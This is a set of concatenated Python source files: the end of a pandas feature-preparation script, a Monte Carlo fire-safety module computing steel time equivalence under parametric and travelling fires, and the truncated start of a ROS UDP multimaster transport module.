feature_train.loc[i, ('op_type_0', 'op_type_1', 'op_type_2', 'op_type_3', 'op_type_4', 'op_type_5',
'op_type_6', 'op_type_7', 'op_type_8', 'op_type_9', 'op_type_perc', 'op_type_std',
'op_type_n', 'op_mode_0',
'op_mode_1', 'op_mode_2', 'op_mode_3', 'op_mode_4', 'op_mode_5', 'op_mode_6', 'op_mode_7',
'op_mode_8',
'op_mode_9', 'op_mode_perc', 'op_mode_std', 'op_mode_n', 'op_device_perc',
'op_device_std',
'op_device_nan_perc', 'op_device_n', 'op_ip_perc', 'op_ip_std', 'op_ip_nan_perc',
'op_ip_n', 'op_net_type_0',
'op_net_type_1', 'op_net_type_2', 'op_net_type_3', 'op_net_type_perc', 'op_net_type_std',
'op_net_type_nan_perc', 'op_channel_0', 'op_channel_1', 'op_channel_2', 'op_channel_3',
'op_channel_4',
'op_channel_perc', 'op_channel_std', 'op_channel_n', 'op_ip_3_perc', 'op_ip_3_std',
'op_ip_3_nan_perc',
'op_ip_3_n', 'op_ip_3_ch_freq', 'op_ip_48h_n', 'op_device_48h_n',
'op_48h_n')] = -1
if feature_train['n_trans'].loc[i] == 0:
feature_train.loc[i, ('trans_platform_0', 'trans_platform_1', 'trans_platform_2', 'trans_platform_3',
'trans_platform_4', 'trans_platform_5', 'trans_platform_perc', 'trans_platform_std',
'trans_platform_n',
'trans_tunnel_in_0', 'trans_tunnel_in_1', 'trans_tunnel_in_2', 'trans_tunnel_in_3',
'trans_tunnel_in_4',
'trans_tunnel_in_5', 'trans_tunnel_in_perc', 'trans_tunnel_in_std', 'trans_tunnel_in_n',
'trans_tunnel_in_nan_perc', 'trans_tunnel_out_0', 'trans_tunnel_out_1',
'trans_tunnel_out_2',
'trans_tunnel_out_3', 'trans_tunnel_out_perc', 'trans_tunnel_out_std', 'trans_tunnel_n',
'trans_amount_max',
'trans_amount_avg', 'trans_amount_std', 'trans_type1_0', 'trans_type1_1', 'trans_type1_2',
'trans_type1_3',
'trans_type1_4', 'trans_type1_perc', 'trans_type1_std', 'trans_ip_perc', 'trans_ip_std',
'trans_ip_nan_perc',
'trans_ip_n', 'trans_type2_0', 'trans_type2_1', 'trans_type2_2', 'trans_type2_3',
'trans_type2_4',
'trans_type2_perc', 'trans_type2_std', 'trans_ip_3_perc', 'trans_ip_3_std',
'trans_ip_3_nan_perc',
'trans_ip_3_n', 'trans_ip_3_ch_freq',
'trans_amount_48h_n', 'trans_48h_n', 'trans_platform_48h_n', 'trans_ip_48h_n')] = -1
feature_train.to_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv', index=False)
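# %%
# Sketch (assumption, equivalent to the loop above): rows for users with no op / trans records can
# also be filled with -1 in one vectorised step by masking on 'n_op' / 'n_trans'; `op_cols` and
# `trans_cols` are the same column groups listed in the loop.
def _fill_missing_blocks(df, op_cols, trans_cols):
    df.loc[df['n_op'] == 0, op_cols] = -1
    df.loc[df['n_trans'] == 0, trans_cols] = -1
    return df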
# %%
feature_train = pd.read_csv(base_dir + '/dataset/dataset2/trainset/feature_train.csv')
train_base_df = pd.read_csv(base_dir + '/dataset/dataset2/trainset/train_base.csv')
feature_train = feature_train.drop(labels='user', axis=1)
train_base_df = train_base_df.join(feature_train)
train_base_df.to_csv(base_dir + '/dataset/dataset2/trainset/train_main.csv', index=False)
|
mcs0_calc.py
|
# -*- coding: utf-8 -*-
import copy
import os
import threading
import warnings
from typing import Union, Callable
import numpy as np
import pandas as pd
from fsetools.lib.fse_bs_en_1991_1_2_parametric_fire import temperature as _fire_param
from fsetools.lib.fse_bs_en_1993_1_2_heat_transfer_c import protection_thickness as _protection_thickness
from fsetools.lib.fse_bs_en_1993_1_2_heat_transfer_c import temperature as _steel_temperature
from fsetools.lib.fse_bs_en_1993_1_2_heat_transfer_c import temperature_max as _steel_temperature_max
from fsetools.lib.fse_din_en_1991_1_2_parametric_fire import temperature as _fire_param_ger
from fsetools.lib.fse_travelling_fire import temperature as fire_travelling
from scipy.interpolate import interp1d
from sfeprapy.func.asciiplot import AsciiPlot
from sfeprapy.func.mcs import MCS
def _fire_travelling(**kwargs):
if isinstance(kwargs["beam_location_length_m"], list) or isinstance(
kwargs["beam_location_length_m"], np.ndarray
):
kwarg_ht_ec = dict(
fire_time=kwargs["t"],
beam_rho=7850,
beam_cross_section_area=0.017,
protection_k=0.2,
protection_rho=800,
protection_c=1700,
protection_thickness=0.005,
protection_protected_perimeter=2.14,
)
temperature_steel_list = list()
temperature_gas_list = fire_travelling(**kwargs)
for temperature in temperature_gas_list:
kwarg_ht_ec["fire_temperature"] = temperature + 273.15
T_a_max, t = _steel_temperature_max(**kwarg_ht_ec)
temperature_steel_list.append(T_a_max)
return (
temperature_gas_list[np.argmax(temperature_steel_list)] + 273.15,
kwargs["beam_location_length_m"][[np.argmax(temperature_steel_list)]][0],
)
elif isinstance(kwargs["beam_location_length_m"], float) or isinstance(
kwargs["beam_location_length_m"], int
):
return fire_travelling(**kwargs) + 273.15, kwargs["beam_location_length_m"]
def decide_fire(
window_height: float,
window_width: float,
window_open_fraction: float,
room_breadth: float,
room_depth: float,
room_height: float,
fire_mode: int,
fire_load_density: float,
fire_combustion_efficiency: float,
fire_hrr_density: float,
fire_spread_speed: float,
*_,
**__,
) -> dict:
"""Calculates equivalent time exposure for a protected steel element member in more realistic fire environment
opposing to the standard fire curve ISO 834.
PARAMETERS:
:param window_height: [m], weighted window opening height
:param window_width: [m], total window opening width
:param window_open_fraction: [-], a factor is multiplied with the given total window opening area
:param room_breadth: [m], room breadth (shorter direction of the floor plan)
:param room_depth: [m], room depth (longer direction of the floor plan)
:param room_height: [m], room height from floor to soffit (structural), disregard any non fire resisting floors
:param fire_hrr_density: [MW m-2], fire maximum release rate per unit area
:param fire_load_density:
:param fire_combustion_efficiency:
:param fire_spread_speed: [m s-1], TRAVELLING FIRE, fire spread speed
:param fire_mode: 0 - parametric, 1 - travelling, 2 - ger parametric, 3 - (0 & 1), 4 (1 & 2)
:return:
EXAMPLE:
"""
# PRELIMINARY CALCULATIONS AND INPUT CHECKS
fire_load_density_deducted = fire_load_density * fire_combustion_efficiency
# Total window opening area
window_area = window_height * window_width * window_open_fraction
# Room floor area
room_floor_area = room_breadth * room_depth
# Room internal surface area, total, including window openings
room_total_area = (2 * room_floor_area) + ((room_breadth + room_depth) * 2 * room_height)
# Fire load density related to the total surface area A_t
fire_load_density_total = (
fire_load_density_deducted * room_floor_area / room_total_area
)
# Opening factor
opening_factor = window_area * np.sqrt(window_height) / room_total_area
# Spread speed - Does the fire spread to involve the full compartment?
fire_spread_entire_room_time = room_depth / fire_spread_speed
burn_out_time = max([fire_load_density_deducted / fire_hrr_density, 900.0])
if fire_mode == 0 or fire_mode == 1 or fire_mode == 2: # enforced to selected fire, i.e. 0 is ec parametric; 1 is travelling; and 2 is din ec parametric
fire_type = fire_mode
elif fire_mode == 3: # enforced to ec parametric + travelling
if (
fire_spread_entire_room_time < burn_out_time
and 0.01 < opening_factor <= 0.2
and 50 <= fire_load_density_total <= 1000
):
fire_type = 0 # parametric fire
else: # Otherwise, it is a travelling fire
fire_type = 1 # travelling fire
elif fire_mode == 4: # enforced to german parametric + travelling
# If fire spreads throughout compartment and ventilation is within EC limits = Parametric fire
if (
fire_spread_entire_room_time < burn_out_time
and 0.125 <= (window_area / room_floor_area) <= 0.5
):
fire_type = 2 # german parametric
else: # Otherwise, it is a travelling fire
fire_type = 1 # travelling fire
else:
raise ValueError("Unknown fire mode {fire_mode}.".format(fire_mode=fire_mode))
return dict(fire_type=fire_type)
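# Minimal usage sketch (illustrative numbers only, not taken from the project's test cases):
# with fire_mode=3 the function picks between the EC parametric fire and the travelling fire.
# For the inputs below the spread time (30 / 0.02 = 1500 s) is shorter than the burn-out time
# (0.8 * 600 / 0.25 = 1920 s), the opening factor is about 0.023 and the fuel load referenced to
# the total surface area is about 186 MJ/m2, so fire_type is expected to come out as 0 (parametric).
def _example_decide_fire():
    return decide_fire(
        window_height=2.0, window_width=20.0, window_open_fraction=0.5,
        room_breadth=16.0, room_depth=30.0, room_height=3.0,
        fire_mode=3, fire_load_density=600.0, fire_combustion_efficiency=0.8,
        fire_hrr_density=0.25, fire_spread_speed=0.02,
    )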
def evaluate_fire_temperature(
window_height: float,
window_width: float,
window_open_fraction: float,
room_breadth: float,
room_depth: float,
room_height: float,
room_wall_thermal_inertia: float,
fire_tlim: float,
fire_type: float,
fire_time: Union[list, np.ndarray],
fire_nft_limit: float,
fire_load_density: float,
fire_combustion_efficiency: float,
fire_hrr_density: float,
fire_spread_speed: float,
fire_t_alpha: float,
fire_gamma_fi_q: float,
beam_position_vertical: float,
beam_position_horizontal: Union[np.ndarray, list, float] = -1.0,
*_,
**__,
) -> dict:
"""Calculate temperature array of pre-defined fire type `fire_type`.
PARAMETERS:
:param window_height: [m], weighted window opening height
:param window_width: [m], total window opening width
:param window_open_fraction: [-], a factor is multiplied with the given total window opening area
:param room_breadth: [m], room breadth (shorter direction of the floor plan)
:param room_depth: [m], room depth (longer direction of the floor plan)
:param room_height: [m], room height from floor to soffit (structural), disregard any non fire resisting floors
:param room_wall_thermal_inertia: [J m-2 K-1 s-1/2], thermal inertia of room lining material
:param fire_tlim: [s], PARAMETRIC FIRE, see parametric fire function for details
:param fire_type: [-],
:param fire_time: [K],
:param fire_load_density:
:param fire_combustion_efficiency:
:param fire_t_alpha:
:param fire_gamma_fi_q:
:param beam_position_vertical:
:param fire_hrr_density: [MW m-2], fire maximum release rate per unit area
:param fire_spread_speed: [m s-1], TRAVELLING FIRE, fire spread speed
:param beam_position_horizontal: [s], beam location, will be solved for the worst case if less than 0.
:param fire_nft_limit: [K], TRAVELLING FIRE, maximum temperature of near field temperature
:return:
EXAMPLE:
"""
fire_load_density_deducted = fire_load_density * fire_combustion_efficiency
# Total window opening area
window_area = window_height * window_width * window_open_fraction
# Room floor area
room_floor_area = room_breadth * room_depth
# Room internal surface area, total, including window openings
room_total_area = 2 * room_floor_area + (room_breadth + room_depth) * 2 * room_height
if fire_type == 0:
kwargs_fire_0_paramec = dict(
t=fire_time,
A_t=room_total_area,
A_f=room_floor_area,
A_v=window_area,
h_eq=window_height,
q_fd=fire_load_density_deducted * 1e6,
lambda_=room_wall_thermal_inertia ** 2,
rho=1,
c=1,
t_lim=fire_tlim,
temperature_initial=20 + 273.15,
)
fire_temperature = _fire_param(**kwargs_fire_0_paramec)
elif fire_type == 1:
if beam_position_horizontal < 0:
beam_position_horizontal = np.linspace(0.5 * room_depth, room_depth, 7)[1:-1]
kwargs_fire_1_travel = dict(
t=fire_time,
fire_load_density_MJm2=fire_load_density_deducted,
fire_hrr_density_MWm2=fire_hrr_density,
room_length_m=room_depth,
room_width_m=room_breadth,
fire_spread_rate_ms=fire_spread_speed,
beam_location_height_m=beam_position_vertical,
beam_location_length_m=beam_position_horizontal,
fire_nft_limit_c=fire_nft_limit - 273.15,
opening_width_m=window_width,
opening_height_m=window_height,
opening_fraction=window_open_fraction,
)
fire_temperature, beam_position_horizontal = _fire_travelling(**kwargs_fire_1_travel)
if beam_position_horizontal <= 0:
raise ValueError("Beam position less or equal to 0.")
elif fire_type == 2:
kwargs_fire_2_param_din = dict(
t_array_s=fire_time,
A_w_m2=window_area,
h_w_m2=window_height,
A_t_m2=room_total_area,
A_f_m2=room_floor_area,
t_alpha_s=fire_t_alpha,
b_Jm2s05K=room_wall_thermal_inertia,
q_x_d_MJm2=fire_load_density_deducted,
gamma_fi_Q=fire_gamma_fi_q,
)
fire_temperature = _fire_param_ger(**kwargs_fire_2_param_din)
else:
fire_temperature = None
return dict(
fire_temperature=fire_temperature,
beam_position_horizontal=beam_position_horizontal,
)
def solve_time_equivalence_iso834(
beam_cross_section_area: float,
beam_rho: float,
protection_k: float,
protection_rho: float,
protection_c: float,
protection_protected_perimeter: float,
fire_time_iso834: Union[list, np.ndarray],
fire_temperature_iso834: Union[list, np.ndarray],
solver_temperature_goal: float,
solver_protection_thickness: float,
phi_teq: float,
*_,
**__,
) -> dict:
"""
**WIP**
Calculates the equivalent time of exposure for a protected steel member in a more realistic fire
environment, as opposed to the standard ISO 834 fire curve.
PARAMETERS:
:param fire_time: [s], time array
:param fire_temperature: [K], temperature array
:param beam_cross_section_area: [m2], the steel beam element cross section area
:param beam_rho: [kg/m3], steel beam element density
:param protection_k: steel beam element protection material thermal conductivity
:param protection_rho: steel beam element protection material density
:param protection_c: steel beam element protection material specific heat
:param protection_protected_perimeter: [m], steel beam element protection material perimeter
:param fire_time_iso834: [s], the time (array) component of ISO 834 fire curve
:param fire_temperature_iso834: [K], the temperature (array) component of ISO 834 fire curve
:param solver_temperature_goal: [K], steel beam element expected failure temperature
:param solver_max_iter: Maximum allowable iteration counts for seeking solution for time equivalence
:param solver_thickness_ubound: [m], protection layer thickness upper bound initial condition for solving time equivalence
:param solver_thickness_lbound: [m], protection layer thickness lower bound initial condition for solving time equivalence
:param solver_tol: [K], tolerance for solving time equivalence
:param phi_teq: [-], model uncertainty factor
:return results: dict
EXAMPLE:
"""
# ============================================
# GOAL SEEK TO MATCH STEEL FAILURE TEMPERATURE
# ============================================
# MATCH PEAK STEEL TEMPERATURE BY ADJUSTING PROTECTION LAYER THICKNESS
# Solve equivalent time exposure in ISO 834
solver_d_p = solver_protection_thickness
if -np.inf < solver_d_p < np.inf:
steel_temperature = _steel_temperature(
fire_time=fire_time_iso834,
fire_temperature=fire_temperature_iso834,
beam_rho=beam_rho,
beam_cross_section_area=beam_cross_section_area,
protection_k=protection_k,
protection_rho=protection_rho,
protection_c=protection_c,
protection_thickness=solver_d_p,
protection_protected_perimeter=protection_protected_perimeter,
)
func_teq = interp1d(steel_temperature, fire_time_iso834, kind="linear", bounds_error=False, fill_value=-1)
solver_time_equivalence_solved = func_teq(solver_temperature_goal)
solver_time_equivalence_solved = solver_time_equivalence_solved * phi_teq
elif solver_d_p == np.inf:
solver_time_equivalence_solved = np.inf
elif solver_d_p == -np.inf:
solver_time_equivalence_solved = -np.inf
elif np.isnan(solver_d_p):
solver_time_equivalence_solved = np.nan
else:
raise ValueError(f'This error should not occur, solver_d_p = {solver_d_p}')
return dict(solver_time_equivalence_solved=solver_time_equivalence_solved)
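# Standalone sketch (an assumption, not called anywhere) of the inversion used above: interpolating
# time as a function of steel temperature turns "what temperature is reached at time t" into
# "at what ISO 834 exposure time is the goal temperature reached". The temperature history here is
# a made-up monotonic stand-in, not a real heat transfer result.
def _example_time_equivalence_inversion(goal_temperature_k: float = 743.15) -> float:
    t = np.arange(0.0, 3600.0, 10.0)
    steel_temperature = 293.15 + 600.0 * (1.0 - np.exp(-t / 900.0))  # monotonic dummy curve [K]
    func_teq = interp1d(steel_temperature, t, kind="linear", bounds_error=False, fill_value=-1)
    return float(func_teq(goal_temperature_k))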
def solve_protection_thickness(
fire_time: Union[list, np.ndarray],
fire_temperature: Union[list, np.ndarray],
beam_cross_section_area: float,
beam_rho: float,
protection_k: float,
protection_rho: float,
protection_c: float,
protection_protected_perimeter: float,
solver_temperature_goal: float,
solver_max_iter: int,
solver_thickness_ubound: float,
solver_thickness_lbound: float,
solver_tol: float,
*_,
**__,
) -> dict:
"""
Solves the protection layer thickness required for the peak steel temperature to reach
`solver_temperature_goal` under the given fire, by iterative goal seeking.
PARAMETERS:
:param fire_time: [s], time array
:param fire_temperature: [K], temperature array
:param beam_cross_section_area: [m2], the steel beam element cross section area
:param beam_rho: [kg/m3], steel beam element density
:param protection_k: steel beam element protection material thermal conductivity
:param protection_rho: steel beam element protection material density
:param protection_c: steel beam element protection material specific heat
:param protection_protected_perimeter: [m], steel beam element protection material perimeter
:param fire_time_iso834: [s], the time (array) component of ISO 834 fire curve
:param fire_temperature_iso834: [K], the temperature (array) component of ISO 834 fire curve
:param solver_temperature_goal: [K], steel beam element expected failure temperature
:param solver_max_iter: Maximum allowable iteration counts for seeking solution for time equivalence
:param solver_thickness_ubound: [m], protection layer thickness upper bound initial condition for solving time equivalence
:param solver_thickness_lbound: [m], protection layer thickness lower bound initial condition for solving time equivalence
:param solver_tol: [K], tolerance for solving time equivalence
:param phi_teq: [-], model uncertainty factor
:return results: dict
EXAMPLE:
"""
# ============================================
# GOAL SEEK TO MATCH STEEL FAILURE TEMPERATURE
# ============================================
# MATCH PEAK STEEL TEMPERATURE BY ADJUSTING PROTECTION LAYER THICKNESS
# Solve protection properties for `solver_temperature_goal`
solver_d_p, solver_T_max_a, solver_t, solver_iter_count = _protection_thickness(
fire_time=fire_time,
fire_temperature=fire_temperature,
beam_rho=beam_rho,
beam_cross_section_area=beam_cross_section_area,
protection_k=protection_k,
protection_rho=protection_rho,
protection_c=protection_c,
protection_protected_perimeter=protection_protected_perimeter,
solver_temperature_goal=solver_temperature_goal,
solver_temperature_goal_tol=solver_tol,
solver_max_iter=solver_max_iter,
d_p_1=solver_thickness_lbound,
d_p_2=solver_thickness_ubound,
)
return dict(
solver_convergence_status=-np.inf < solver_d_p < np.inf,
solver_steel_temperature_solved=solver_T_max_a,
solver_time_solved=solver_t,
solver_protection_thickness=solver_d_p,
solver_iter_count=solver_iter_count,
)
def mcs_out_post_per_case(df: pd.DataFrame, fp: str) -> pd.DataFrame:
# save outputs if work direction is provided per iteration
if fp:
def _save_(fp_: str):
try:
if not os.path.exists(os.path.dirname(fp_)):
os.makedirs(os.path.dirname(fp_))
except Exception as e:
print(e)
df.to_csv(os.path.join(fp_), index=False)
threading.Thread(target=_save_, kwargs=dict(fp_=fp)).start()
df_res = copy.copy(df)
df_res = df_res.replace(to_replace=[np.inf, -np.inf], value=np.nan)
df_res = df_res.dropna(axis=0, how="any")
dict_ = dict()
dict_["fire_type"] = str(
{
k: np.sum(df_res["fire_type"].values == k)
for k in np.unique(df_res["fire_type"].values)
}
)
for k in [
"beam_position_horizontal",
"fire_combustion_efficiency",
"fire_hrr_density",
"fire_load_density",
"fire_nft_limit",
"fire_spread_speed",
"window_open_fraction",
"phi_teq",
"timber_fire_load",
]:
try:
x = df_res[k].values
x1, x2, x3 = np.min(x), np.mean(x), np.max(x)
dict_[k] = f"{x1:<9.3f} {x2:<9.3f} {x3:<9.3f}"
except Exception:
pass
list_ = [f"{k:<24.24}: {v}" for k, v in dict_.items()]
print("\n".join(list_), "\n")
try:
x = np.array(df_res['solver_time_equivalence_solved'].values / 60, dtype=float)
x[x == -np.inf] = 0
x[x == np.inf] = np.amax(x[x != np.inf])
y = np.linspace(0, 1, len(x), dtype=float)
aplot = AsciiPlot(size=(55, 15))
aplot.plot(x=x, y=y, xlim=(20, min([180, np.amax(x)])))
aplot.show()
except Exception as e:
print(f'Failed to plot time equivalence, {e}')
return df
def teq_main_wrapper(args):
try:
kwargs, q = args
q.put("index: {}".format(kwargs["index"]))
return teq_main(**kwargs)
except (ValueError, AttributeError):
return teq_main(**args)
def teq_main(
case_name: str,
n_simulations: int,
index: int,
beam_cross_section_area: float,
beam_position_vertical: float,
beam_position_horizontal: float,
beam_rho: float,
fire_time_duration: float,
fire_time_step: float,
fire_combustion_efficiency: float,
fire_gamma_fi_q: float,
fire_hrr_density: float,
fire_load_density: float,
fire_mode: int,
fire_nft_limit: float,
fire_spread_speed: float,
fire_t_alpha: float,
fire_tlim: float,
protection_c: float,
protection_k: float,
protection_protected_perimeter: float,
protection_rho: float,
room_breadth: float,
room_depth: float,
room_height: float,
room_wall_thermal_inertia: float,
solver_temperature_goal: float,
solver_max_iter: int,
solver_thickness_lbound: float,
solver_thickness_ubound: float,
solver_tol: float,
window_height: float,
window_open_fraction: float,
window_width: float,
window_open_fraction_permanent: float,
phi_teq: float = 1.0,
timber_charring_rate=None,
timber_hc: float = None,
timber_density: float = None,
timber_exposed_area: float = None,
timber_solver_tol: float = None,
timber_solver_ilim: float = None,
*_,
**__,
) -> dict:
# Make the longest dimension between (room_depth, room_breadth) as room_depth
if room_depth < room_breadth:
room_depth += room_breadth
room_breadth = room_depth - room_breadth
room_depth -= room_breadth
window_open_fraction = (window_open_fraction * (1 - window_open_fraction_permanent) + window_open_fraction_permanent)
# Fix ventilation opening size so it doesn't exceed wall area
if window_height > room_height:
window_height = room_height
# Calculate fire time, this is used for all fire curves in the calculation
fire_time = np.arange(0, fire_time_duration + fire_time_step, fire_time_step)
# Calculate ISO 834 fire temperature
fire_time_iso834 = fire_time
fire_temperature_iso834 = (345.0 * np.log10((fire_time / 60.0) * 8.0 + 1.0) + 20.0) + 273.15 # in [K]
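# ISO 834 standard curve: T [degC] = 20 + 345 * log10(8 * t + 1), with t in minutes;
# the trailing + 273.15 converts the result to kelvin to match the heat transfer solver's units.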
inputs = copy.deepcopy(locals())
inputs.pop('_'), inputs.pop('__')
# initialise solver iteration count for timber fuel contribution
timber_solver_iter_count = -1
timber_exposed_duration = 0 # initial condition, timber exposed duration
_fire_load_density_ = inputs.pop('fire_load_density') # preserve original fire load density
while True:
timber_solver_iter_count += 1
if isinstance(timber_charring_rate, (float, int)):
timber_charring_rate_i = timber_charring_rate
elif isinstance(timber_charring_rate, Callable):
timber_charring_rate_i = timber_charring_rate(timber_exposed_duration)
else:
raise TypeError('timber_charring_rate is neither a numerical nor a Callable type')
timber_charring_rate_i *= 1 / 1000 # [mm/min] -> [m/min]
timber_charring_rate_i *= 1 / 60 # [m/min] -> [m/s]
timber_charred_depth = timber_charring_rate_i * timber_exposed_duration
timber_charred_volume = timber_charred_depth * timber_exposed_area
timber_charred_mass = timber_density * timber_charred_volume
timber_fire_load = timber_charred_mass * timber_hc
timber_fire_load_density = timber_fire_load / (room_breadth * room_depth)
inputs['fire_load_density'] = _fire_load_density_ + timber_fire_load_density
# To check what design fire to use
inputs.update(decide_fire(**inputs))
# To calculate design fire temperature
inputs.update(evaluate_fire_temperature(**inputs))
# To solve protection thickness at critical temperature
inputs.update(solve_protection_thickness(**inputs))
# additional fuel contribution from timber
if timber_exposed_area is None or timber_exposed_area <= 0:  # no timber exposed
# Exit timber fuel contribution solver if:
# 1. no timber exposed
# 2. timber exposed area undefined
break
elif timber_solver_iter_count >= timber_solver_ilim:
inputs['solver_convergence_status'] = np.nan
inputs['solver_steel_temperature_solved'] = np.nan
inputs['solver_time_solved'] = np.nan
inputs['solver_protection_thickness'] = np.nan
inputs['solver_iter_count'] = np.nan
timber_exposed_duration = np.nan
break
elif not -np.inf < inputs["solver_protection_thickness"] < np.inf:
# no protection thickness solution
timber_exposed_duration = inputs['solver_protection_thickness']
break
elif abs(timber_exposed_duration - inputs["solver_time_solved"]) <= timber_solver_tol:
# convergence sought successfully
break
else:
timber_exposed_duration = inputs["solver_time_solved"]
inputs.update(solve_time_equivalence_iso834(**inputs))
inputs.update(
dict(
timber_charring_rate=timber_charring_rate_i,
timber_exposed_duration=timber_exposed_duration,
timber_solver_iter_count=timber_solver_iter_count,
timber_fire_load=timber_fire_load,
timber_charred_depth=timber_charred_depth,
timber_charred_mass=timber_charred_mass,
timber_charred_volume=timber_charred_volume,
)
)
# Prepare results to be returned, only the items in the list below will be returned
# add keys accordingly if more parameters are desired to be returned
outputs = {
i: inputs[i] for i in
['phi_teq', 'fire_spread_speed', 'fire_nft_limit', 'fire_mode', 'fire_load_density', 'fire_hrr_density', 'fire_combustion_efficiency', 'beam_position_horizontal',
# 'beam_position_vertical', 'index', 'probability_weight', 'case_name', 'fire_type', 'solver_convergence_status', 'solver_time_equivalence_solved',
'beam_position_vertical', 'index', 'case_name', 'fire_type', 'solver_convergence_status', 'solver_time_equivalence_solved',
'solver_steel_temperature_solved', 'solver_protection_thickness', 'solver_iter_count', 'window_open_fraction', 'timber_solver_iter_count', 'timber_charred_depth']
}
return outputs
def mcs_out_post_all_cases(df: pd.DataFrame, fp: str):
if fp:
df[['case_name', 'index', 'solver_time_equivalence_solved']].to_csv(fp, index=False)
class MCS0(MCS):
def __init__(self):
super().__init__()
def mcs_deterministic_calc(self, *args, **kwargs) -> dict:
return teq_main(*args, **kwargs)
def mcs_deterministic_calc_mp(self, *args, **kwargs) -> dict:
return teq_main_wrapper(*args, **kwargs)
def mcs_post_per_case(self, df: pd.DataFrame):
case_name = df['case_name'].to_numpy()
assert (case_name == case_name[0]).all()
case_name = case_name[0]
try:
fp = os.path.join(self.cwd, self.DEFAULT_TEMP_FOLDER_NAME, f'{case_name}.csv')
except TypeError:
fp = None
return mcs_out_post_per_case(df=df, fp=fp)
def mcs_post_all_cases(self, df: pd.DataFrame):
try:
fp = os.path.join(self.cwd, self.DEFAULT_MCS_OUTPUT_FILE_NAME)
except TypeError:
fp = None
return mcs_out_post_all_cases(df=df, fp=fp)
def _test_teq_phi():
warnings.filterwarnings("ignore")
from sfeprapy.func.fire_iso834 import fire as fire_iso834
fire_time_ = np.arange(0, 2 * 60 * 60, 1)
fire_temperature_iso834_ = fire_iso834(fire_time_, 293.15)
input_param = dict(
index=0,
case_name="Standard 1",
probability_weight=1.,
fire_time_step=1.,
fire_time_duration=5. * 60 * 60,
n_simulations=1,
beam_cross_section_area=0.017,
beam_position_vertical=2.5,
beam_position_horizontal=18,
beam_rho=7850.,
fire_combustion_efficiency=0.8,
fire_gamma_fi_q=1,
fire_hrr_density=0.25,
fire_load_density=420,
fire_mode=0,
fire_nft_limit=1050,
fire_spread_speed=0.01,
fire_t_alpha=300,
fire_tlim=0.333,
fire_temperature_iso834=fire_temperature_iso834_,
fire_time_iso834=fire_time_,
protection_c=1700.,
protection_k=0.2,
protection_protected_perimeter=2.14,
protection_rho=800.,
room_breadth=16,
room_depth=31.25,
room_height=3,
room_wall_thermal_inertia=720,
solver_temperature_goal=620 + 273.15,
solver_max_iter=200,
solver_thickness_lbound=0.0001,
solver_thickness_ubound=0.0500,
solver_tol=0.01,
window_height=2,
window_open_fraction=0.8,
window_width=72,
window_open_fraction_permanent=0,
phi_teq=0.1,
timber_charring_rate=0.7,
timber_exposed_area=0,
timber_hc=400,
timber_density=500,
timber_solver_ilim=20,
timber_solver_tol=1,
)
input_param["phi_teq"] = 1.0
teq_10 = teq_main(**input_param)["solver_time_equivalence_solved"]
input_param["phi_teq"] = 0.1
teq_01 = teq_main(**input_param)["solver_time_equivalence_solved"]
print(
f'Time equivalence at phi_teq=0.1: {teq_01:<8.3f}\n'
f'Time equivalence at phi_teq=1.0: {teq_10:<8.3f}\n'
f'Ratio between the above: {teq_10 / teq_01:<8.3f}\n'
)
assert abs(teq_10 / teq_01 - 10) < 0.01
def _test_standard_case():
import copy
from sfeprapy.mcs0 import EXAMPLE_INPUT_DICT, EXAMPLE_CONFIG_DICT
from scipy.interpolate import interp1d
# increase the number of simulations so it gives sensible results
mcs_input = copy.deepcopy(EXAMPLE_INPUT_DICT)
mcs_config = copy.deepcopy(EXAMPLE_CONFIG_DICT)
mcs_config["n_threads"] = 1
mcs = MCS0()
mcs.mcs_inputs = mcs_input
mcs.mcs_config = mcs_config
mcs.run_mcs()
mcs_out = mcs.mcs_out
def get_time_equivalence(data, fractile: float):
hist, edges = np.histogram(data, bins=np.arange(0, 181, 0.5))
x, y = (edges[:-1] + edges[1:]) / 2, np.cumsum(hist / np.sum(hist))
return interp1d(y, x)(fractile)
mcs_out_standard_case_1 = mcs_out.loc[mcs_out['case_name'] == 'Standard Case 1']
teq = mcs_out_standard_case_1["solver_time_equivalence_solved"] / 60.0
teq_at_80_percentile = get_time_equivalence(teq, 0.8)
print(f'Time equivalence at CDF 0.8 is {teq_at_80_percentile:<6.3f} min')
target, target_tol = 60, 2
assert target - target_tol < teq_at_80_percentile < target + target_tol
mcs_out_standard_case_2 = mcs_out.loc[mcs_out['case_name'] == 'Standard Case 2 (with teq_phi)']
teq = mcs_out_standard_case_2["solver_time_equivalence_solved"] / 60.0
teq_at_80_percentile = get_time_equivalence(teq, 0.8)
print(f'Time equivalence at CDF 0.8 is {teq_at_80_percentile:<6.3f} min')
target, target_tol = 64, 2 # 64 minutes based on a test run on 2nd Oct 2020
assert target - target_tol < teq_at_80_percentile < target + target_tol
mcs_out_standard_case_3 = mcs_out.loc[mcs_out['case_name'] == 'Standard Case 3 (with timber)']
teq = mcs_out_standard_case_3["solver_time_equivalence_solved"] / 60.0
teq_at_80_percentile = get_time_equivalence(teq, 0.8)
print(f'Time equivalence at CDF 0.8 is {teq_at_80_percentile:<6.3f} min')
target, target_tol = 90, 2 # 81 minutes based on a test run on 2nd Oct 2020
assert target - target_tol < teq_at_80_percentile < target + target_tol
if __name__ == '__main__':
_test_teq_phi()
_test_standard_case()
|
transport.py
|
#!/usr/bin/env python
# https://stackoverflow.com/questions/12607516/python-udp-broadcast-not-sending
# https://stackoverflow.com/questions/15962119/using-bytearray-with-socket-recv-into
from socket import *
# Dynamic load msg classes
import roslib
import imp
import sys
import threading
import rospy
from StringIO import StringIO
from multimaster_udp.msg import Msg, TopicInfo
from multimaster_udp.srv import AdvertiseUDP
if sys.version_info >= (3, 0):
import socketserver
else:
import SocketServer as socketserver
def get_class(msg_class):
def load_pkg_module(package, directory):
# check if it's in the python path
path = sys.path
try:
imp.find_module(package)
except ImportError:
roslib.load_manifest(package)
try:
m = __import__( package + '.' + directory )
except Exception:
rospy.logerr( "Cannot import package : %s"% package )
rospy.logerr( "sys.path was " + str(path) )
return None
return m
def load_message(package, message):
m = load_pkg_module(package, 'msg')
m2 = getattr(m, 'msg')
return getattr(m2, message)
try:
loaded_class = load_message(*msg_class.split('/'))
except Exception:
loaded_class = None
finally:
return loaded_class
def UDPSetup(topic_name, data_type):
topic = TopicInfo(topic_name, data_type._type, data_type._md5sum, 0)
rospy.wait_for_service("organizer/topic")
topic_srv = rospy.ServiceProxy("organizer/topic", AdvertiseUDP)
result = topic_srv.call(topic)
return result.topic
class UDPPublisher(object):
"""docstring for UDPPublisher"""
def __init__(self, topic_name, data_type, network_address="192.168.1.1", network_size=8):
super(UDPPublisher, self).__init__()
